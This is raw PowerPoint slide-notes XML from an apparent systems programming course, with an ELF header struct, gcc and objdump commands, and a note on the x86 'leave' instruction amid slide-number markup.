      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1248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655250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2544A-444A-AC44-8626-EEBE420A2983}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>304</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232898" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232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9494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2592A-B447-4747-B2BF-056FA96C4987}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019906" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019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33937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440C3-8EE3-414C-B113-35DB18643036}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>305</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233922" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233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847213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C5AF8-7899-C441-83F6-2BFFDD47B7A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>306</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234946" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234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820384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51300-B528-B243-9A37-14A6E4D2A2BC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>307</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1235970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123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0273704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ED802-6FF4-0040-AAD0-E52D23D938DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>308</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1236994" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1236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66215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A6E57-249C-6844-AFF3-99296BF1A608}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>309</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238018" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238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86082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45A2A-0773-5F43-BF0F-86D7707AC903}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>310</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239042" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239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753122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30F36-5AFA-A64D-B224-CC3F763AE386}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>315</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191938" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191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816333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E0BBC0-E44C-A440-963D-0C6AED8A9A4B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>317</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192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9414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FD688-6B2C-5049-9211-A6DB3E582AA7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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4735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48EDD-1C0A-384D-B172-B3B742C536A2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102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7886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34BB8-1AA3-BD46-9E1E-719BB9FEA8D5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056770" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056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4656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3103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"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en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1120218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3103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"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en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856461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5AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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182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85A03-163E-1E4C-8C68-36E8EC5C6F82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028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3517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5AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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1711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BE3C8-9F72-6D44-A7A1-0A50BBDE42EF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>35</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6323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2EAA3-B90B-3540-B74E-FE7D42A3FF5B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98611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98611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97417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3B87E9A-786A-1E4C-9343-694BBFBBC8F0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1334906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83A21-1A9A-594A-986F-08077ACB5965}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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2166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C7212-411B-5942-8FEE-692F89AA7222}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>55</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0123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4E7AA-CE59-7241-833E-74CB5FA3AB0C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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327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6D8B9-543B-D548-B07D-5D7D55BDA067}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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720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CFF37-792C-D04D-97E6-B44DB70C7969}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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6491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E289D-CBF1-6B44-845D-019EC8EB04E8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>61</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502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5CB9E-6733-0B47-B84D-F59E3D4DA6AF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99635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99635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a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char magic[4] = ”\177ELF"; // magic number  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char class; // address size, 1 = 32 bit, 2 = 64 bit  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char byteorder; // 1 = little-endian, 2 = big-endian  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char hversion; // header version, always 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char pad[9]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short filetype; // file type: 1 = relocatable, 2 = executable,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>                      // 3 = shared object, 4 = core image  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short archtype; // 2 = SPARC, 3 = x86, 4 = 68K, etc.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int fversion; // file version, always 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int entry; // entry point if executable  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int phdrpos; // file position of program header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int shdrpos; // file position of section header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int flags; // architecture specific flags, usually 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short hdrsize; // size of this ELF header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short phdrent; // size of an entry in program header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short phdrcnt; // number of entries in program header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short shdrent; // size of an entry in section header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short phdrcnt; // number of entries in section header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short strsec; // section number that contains section name strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2129737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0524B-EAAB-A245-8B91-2BDAE27A256D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>62</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046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1A4070E-5EB9-564E-AA70-CD0932C2E1FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1323598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D1A39-98F2-8A4C-B616-4A88B9D6E6CA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>69</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261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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>a.out</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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1422525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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="518661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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="811785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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1517069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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1244773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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
